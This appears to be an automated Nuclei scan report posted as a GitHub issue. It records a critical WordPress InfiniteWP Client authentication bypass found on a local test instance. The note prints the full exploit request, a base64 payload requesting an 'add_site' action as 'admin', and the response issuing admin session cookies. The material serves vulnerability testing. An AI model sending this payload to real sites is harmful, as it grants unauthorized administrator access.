ehsandeep / wordpress-application

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337

github-actions opened this issue · comments

Details: wordpress-infinitewp-auth-bypass matched at http://127.0.0.1:31337

Protocol: HTTP

Full URL: http://127.0.0.1:31337/

Timestamp: Tue Jul 6 13:46:47 +0000 UTC 2021

Template Information

Key Value
tags wordpress,auth-bypass,wp-plugin
name WordPress InfiniteWP Client Authentication Bypass
author princechaddha
severity critical

Request

POST / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 93
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
ContentLength: 3537
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:47 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=5FL4YXAfW9fxAZgXqRYRfGADNqQt4Ckd; expires=Thu, 08-Jul-2021 13:46:47 GMT; Max-Age=172800; path=/
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Ce08fcf9c3a43ccf242a91fc286ad7491bac76999655ac34019e89159d697edd1; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Ce08fcf9c3a43ccf242a91fc286ad7491bac76999655ac34019e89159d697edd1; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Cb7e65bcb519f690b989c99e42682ff74add98ecdc186e693588612ffd75ba5b7; path=/; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7C325f695f4b52e4c84037338dae8ab9659ebae16ab7eeb6899fb1a19bd616b2f6; path=/wp-content/plugins; secure; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7C325f695f4b52e4c84037338dae8ab9659ebae16ab7eeb6899fb1a19bd616b2f6; path=/wp-admin; secure; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7Cc710619367ff0d28ed57e20bc2f37601291623cd797451fbba1aae451d1ed765; path=/; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>

Reference:


Generated by Nuclei